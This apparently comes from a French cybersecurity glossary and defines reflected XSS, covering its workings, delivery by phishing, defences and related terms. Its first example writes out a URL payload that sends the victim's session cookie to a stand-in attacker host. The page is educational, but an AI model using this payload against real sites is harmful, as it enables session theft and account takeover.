XSS Réfléchi
Qu'est-ce que XSS Réfléchi ?
XSS RéfléchiXSS non persistant où l'entrée contrôlée par l'attaquant est immédiatement reflétée dans la réponse et exécutée dans le navigateur de la victime.
Le XSS réfléchi (non persistant, Type 1) se produit lorsqu'une application web prend des données issues d'une requête HTTP — souvent un paramètre d'URL ou un champ de formulaire — et les renvoie dans la réponse sans encodage de sortie adéquat. L'attaque requiert que la victime clique sur un lien forgé, c'est pourquoi elle est généralement diffusée par hameçonnage, malvertising ou messagerie. Une exploitation réussie permet de voler des cookies de session, d'agir au nom de l'utilisateur ou de mener à un compromis complet du compte. Les défenses incluent l'encodage HTML contextuel, une Content Security Policy stricte et les frameworks qui échappent automatiquement les sorties.
● Exemples
- 01
https://exemple.com/search?q=<script>document.location='https://mechant/?c='+document.cookie</script>
- 02
Page d'erreur qui restitue un paramètre 'message' non assaini directement dans le DOM.
● Questions fréquentes
Qu'est-ce que XSS Réfléchi ?
XSS non persistant où l'entrée contrôlée par l'attaquant est immédiatement reflétée dans la réponse et exécutée dans le navigateur de la victime. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.
Que signifie XSS Réfléchi ?
XSS non persistant où l'entrée contrôlée par l'attaquant est immédiatement reflétée dans la réponse et exécutée dans le navigateur de la victime.
Comment fonctionne XSS Réfléchi ?
Le XSS réfléchi (non persistant, Type 1) se produit lorsqu'une application web prend des données issues d'une requête HTTP — souvent un paramètre d'URL ou un champ de formulaire — et les renvoie dans la réponse sans encodage de sortie adéquat. L'attaque requiert que la victime clique sur un lien forgé, c'est pourquoi elle est généralement diffusée par hameçonnage, malvertising ou messagerie. Une exploitation réussie permet de voler des cookies de session, d'agir au nom de l'utilisateur ou de mener à un compromis complet du compte. Les défenses incluent l'encodage HTML contextuel, une Content Security Policy stricte et les frameworks qui échappent automatiquement les sorties.
Comment se défendre contre XSS Réfléchi ?
Les défenses contre XSS Réfléchi combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.
Quels sont les autres noms de XSS Réfléchi ?
Noms alternatifs courants : XSS non persistant, XSS Type 1.
● Termes liés
- attacks№ 240
Cross-Site Scripting (XSS)
Vulnérabilité web permettant à un attaquant d'injecter des scripts malveillants dans des pages consultées par d'autres utilisateurs, exécutés dans leur navigateur sous l'origine du site.
- attacks№ 1107
XSS Stocké
Faille XSS persistante : le script de l'attaquant est enregistré sur le serveur puis exécuté dans le navigateur de chaque visiteur.
- attacks№ 347
XSS Basé sur le DOM
Variante de XSS où l'injection et l'exécution se produisent entièrement dans le navigateur, du JavaScript client écrivant des données non assainies dans un sink dangereux.
- appsec№ 214
Politique de sécurité du contenu (CSP)
En-tête HTTP indiquant au navigateur quelles sources de scripts, styles, cadres et autres contenus sont autorisées, limitant l'impact des XSS et des injections de données.
- attacks№ 821
Hameçonnage
Attaque d'ingénierie sociale où un attaquant se fait passer pour une entité de confiance afin de pousser la victime à révéler des identifiants, transférer de l'argent ou exécuter un logiciel malveillant.
- appsec№ 773
Encodage de sortie
Transformation des données non fiables dans une forme sûre pour un contexte précis (HTML, JavaScript, URL, SQL, shell) afin qu'elles ne s'évadent pas pour être exécutées comme du code.
● Voir aussi
- № 104XSS Aveugle